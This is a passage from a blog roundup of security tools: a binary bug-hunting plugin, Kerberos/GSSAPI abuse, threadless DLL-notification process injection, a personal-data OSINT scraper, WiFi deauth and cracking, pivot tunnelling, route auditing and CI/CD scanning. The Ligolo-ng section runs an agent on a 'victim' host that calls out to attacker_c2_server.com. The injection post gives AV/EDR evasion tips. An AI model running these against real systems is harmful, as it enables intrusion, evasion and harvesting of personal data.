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VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries

By: Zion3R
26 April 2022 at 21:30

The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where a Hexrays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.


Place the vulfi.py, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first Options > Compiler. After that VulFi will do its best to filter all obvious false positives (such as call to printf with constant string as a first parameter). Please note that while the plugin is made without any ties to a specific ar chitecture some processors do not have full support for specifying types and in such case VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.



To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed or once the previous results are loaded a table will be presented with a view containing following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

In case that there are no data inside the idb/i64 file or user decides to perform a new scan. The plugin will ask whether it should run the scan using the default included rules or whether it should use a custom rules file. Please note that running a new scan with already existing data does not overwrite the previously found items identified by the rule with the same name as the one with previously stored results. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.


Whenever you would like to inspect the detected instance of a possible vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using a right-click and option Set Vulfi Comment allows you to enter comment for the given instance (to justify the status for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file with set of multiple rules. To create a custom rule file with the below structure you can use the included template file here.

[   // An array of rules
"name": "RULE NAME", // The name of the rule
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)

An example rule that looks for all cross-references to function malloc and checks whether its paramter is not constant and whether the return value of the function is checked is shown below:

"name": "Possible Null Pointer Dereference",
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Low": "False"


Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)


  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True

Issues and Warnings

  • When you request the parameter with index that is out of bounds any call to a function will be marked as Low priority. This is a way to avoid missing cross references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view and change context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, moving the VulFi view to the side-view so that it is always visible or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.

Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R
20 January 2024 at 11:30

gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.


On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf


The libkrb5-dev package needs to be installed prior to installing python requirements


Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.


python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.


Adding a DNS A record for host ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data
[+] Applied 1 updates successfully

Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution

nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com

Name: ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com

Name: ahost.ad.ginge.com

DllNotificationInjection - A POC Of A New "Threadless" Process Injection Technique That Works By Utilizing The Concept Of DLL Notification Callbacks In Local And Remote Processes

By: Zion3R
21 January 2024 at 11:30

DllNotificationInection is a POC of a new β€œthreadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

An accompanying blog post with more details is available here:


How It Works?

DllNotificationInection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching of the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.

Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.

After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.


This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.


Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R
22 January 2024 at 11:30

Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.

Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

Whats New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-webscrapping techniques.
  • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
  • Implemented Multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems


To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.


  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.


Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.

Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R
23 January 2024 at 11:30

Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.


To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/[email protected]


Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

VAR_NAME: value
# Add more variables...

parallel: true|false
- name: task-name
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

- name: example-task
- echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.


Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

ORG: "example.org"
OUTPUT_DIR: "results"

- name: example-task
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"

parallel: false
- name: reverse-whois
silent: false
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

- name: finding-subdomains
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false

- name: cleaning-subdomains
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true

- name: resolving-subdomains
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false

- name: checking-alive-subdomains
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.


Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!


Inspiration of this project comes from Awesome taskfile project.

Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R
24 January 2024 at 11:30

Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!


Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.


This software only works on linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.


The installation instructions are available here.


The documentation about the usage of the application is available here.


This project is released under MIT license.


If you have any question about the usage of the application, do not hesitate to open a discussion

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request

Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

By: Zion3R
25 January 2024 at 11:30

AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.

How to use

  • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
  • Install all dependencies by typing pip install -r requirements.txt.
  • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
  • Create a file named .openai-key and paste your chatgpt api key in there.
  • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
  • Create a file named β€˜domains.txt’. Type in a line-separated list of domains you’d like to scan.
  • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
  • Run antisquat using python3.8 antisquat.py domains.txt


Let’s say you’d like to run antisquat on "flipkart.com".

Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.

Test case:

A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py

Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

If you'd like to know more about the tool, make sure to check out our blog.


To know more about our Attack Surface Management platform, check out NVADR.

Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R
26 January 2024 at 11:30

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng


When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up


You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
β”‚ Interface 3 β”‚
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ β”‚

Add a route on the proxy/relay server to the agent network.


$ sudo ip route add dev ligolo


> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add mask if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the agent network from the proxy server.

$ nmap -v -sV -n
$ rdesktop

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent ( and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr --to --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ β”‚ β”‚

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.



Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)


You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c -p 24483
Connecting to host, port 24483
[ 5] local port 50654 connected to port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver


Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.


  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.


  • Nicolas Chatelain <nicolas -at- chatelain.me>

Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes

By: Zion3R
27 January 2024 at 11:30

Find authentication (authn) and authorization (authz) security bugs in web application routes:

Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:

Supported web frameworks (route-detect IDs in parentheses):

  • Python: Django (django, django-rest-framework), Flask (flask), Sanic (sanic)
  • PHP: Laravel (laravel), Symfony (symfony), CakePHP (cakephp)
  • Ruby: Rails* (rails), Grape (grape)
  • Java: JAX-RS (jax-rs), Spring (spring)
  • Go: Gorilla (gorilla), Gin (gin), Chi (chi)
  • JavaScript/TypeScript: Express (express), React (react), Angular (angular)

*Rails support is limited. Please see this issue for more information.


Use pip to install route-detect:

$ python -m pip install --upgrade route-detect

You can check that route-detect is installed correctly with the following command:

$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.


Found '1 == 1', your route-detect installation is working correctly

1Ò”† print(1 == 1)

Ran 1 rule on 1 file: 1 finding.


route-detect provides the routes CLI command and uses semgrep to search for routes.

Use the which subcommand to point semgrep at the correct web application rules:

$ semgrep --config $(routes which django) path/to/django/code

Use the viz subcommand to visualize route information in your browser:

$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json

If you're not sure which framework to look for, you can use the special all ID to check everything:

$ semgrep --json --config $(routes which all) --output routes.json path/to/code

If you have custom authn or authz logic, you can copy route-detect's rules:

$ cp $(routes which django) my-django.yml

Then you can modify the rule as necessary and run it like above:

$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json


route-detect uses poetry for dependency and configuration management.

Before proceeding, install project dependencies with the following command:

$ poetry install --with dev


Lint all project files with the following command:

$ poetry run pre-commit run --all-files


Run Python tests with the following command:

$ poetry run pytest --cov

Run Semgrep rule tests with the following command:

$ poetry run semgrep --test --config routes/rules/ tests/test_rules/

Raven - CI/CD Security Analyzer

By: Zion3R
28 January 2024 at 11:30

RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.

What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.


  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+


Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.


The tool contains three main functionalities, download and index and report.


Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

